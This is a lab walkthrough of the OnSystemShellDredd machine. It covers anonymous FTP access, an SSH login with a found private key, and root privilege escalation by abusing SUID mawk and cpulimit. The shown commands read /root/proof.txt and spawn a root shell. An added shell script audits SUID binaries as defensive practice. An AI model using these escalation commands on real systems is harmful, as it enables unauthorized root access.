OnSystemShellDredd OSCP Lab Walkthrough

MACHINE: OnSystemShellDredd

LEVEL: EASY

FROM: OSCP-PORTAL/VULNHUB


Nmap

 PORT  STATE SERVICE REASON     VERSION  
 21/tcp open ftp   syn-ack ttl 63 vsftpd 3.0.3  
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)  
 | ftp-syst:   
 |  STAT:   
 | FTP server status:  
 |   Connected to ::ffff:192.168.49.60  
 |   Logged in as ftp  
 |   TYPE: ASCII  
 |   No session bandwidth limit  
 |   Session timeout in seconds is 300  
 |   Control connection is plain text  
 |   Data connections will be plain text  
 |   At session startup, client count was 4  
 |   vsFTPd 3.0.3 - secure, fast, stable  
 |_End of status  
 Service Info: OS: Unix  

Only port 21 (FTP) is open.

PORT 21

Anonymous login is allowed.






After a full port scan, I found port 6100 with an SSH service running.



We have an id_rsa key, an approximate username (Hannah) and the SSH port, so I tried to log in over SSH.


Yep, we logged in successfully :)

Got local.txt.

Privilege Escalation

Wow, this machine doesn't have a sudo binary, interesting!!!

I transferred linpeas.sh to the victim machine for further enumeration.




SUID Abuse?

This permission is called SUID, which stands for Set owner User ID.

In this case, mawk and cpulimit have the SUID bit set with root as the owner, so we can easily abuse them to become root.

GTFOBins

GTFOBins is an amazing website that lists Unix binaries which can be abused (for example through SUID) to bypass local security restrictions on misconfigured systems.



mawk SUID abuse

LFILE=/root/proof.txt

mawk '//' "$LFILE"




Another way

cpulimit SUID abuse

cpulimit -l 100 -f -- /bin/sh -p
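
From the defender's side, the finding above (SUID root on mawk and cpulimit) is what a periodic SUID audit should catch. The script below is an added example, not part of the original walkthrough: the WATCHLIST and BASELINE contents, the sample paths and the helper names are assumptions, and collect_suid relies on GNU find's -printf.

```shell
#!/bin/sh
# Added example: triage SUID files against a baseline (assumed lists, tune per distro).

# Programs that can run commands or read arbitrary files; they should never be SUID root.
WATCHLIST="mawk gawk awk cpulimit find vim less env bash sh perl python3"
# SUID binaries expected on a stock Debian-like install (assumed baseline).
BASELINE="/usr/bin/passwd /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# Emit "owner mode path" for every SUID regular file under $1 (default /).
collect_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 -printf '%u %m %p\n' 2>/dev/null
}

# Read "owner mode path" lines on stdin; print "VERDICT path" for root-owned files.
triage_suid() {
    while read -r owner mode path; do
        [ "$owner" = "root" ] || continue      # only SUID-root grants root
        name=${path##*/}
        case " $WATCHLIST " in
            *" $name "*) echo "CRITICAL $path"; continue ;;
        esac
        case " $BASELINE " in
            *" $path "*) echo "EXPECTED $path" ;;
            *)           echo "REVIEW $path" ;;   # unknown SUID binary, check by hand
        esac
    done
}

# Constructed sample listing that mirrors the misconfiguration in this lab.
sample_listing() {
    cat <<'EOF'
root 4755 /usr/bin/passwd
root 4755 /usr/bin/mawk
root 4755 /usr/bin/cpulimit
root 4755 /usr/local/bin/backup-helper
hannah 4755 /home/hannah/tool
EOF
}

# Demo on the sample; on a real host run: collect_suid / | triage_suid
sample_listing | triage_suid
```

Anything reported as CRITICAL should have the bit cleared with chmod u-s, since neither mawk nor cpulimit needs root privileges to do its job.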


 
That's it :)

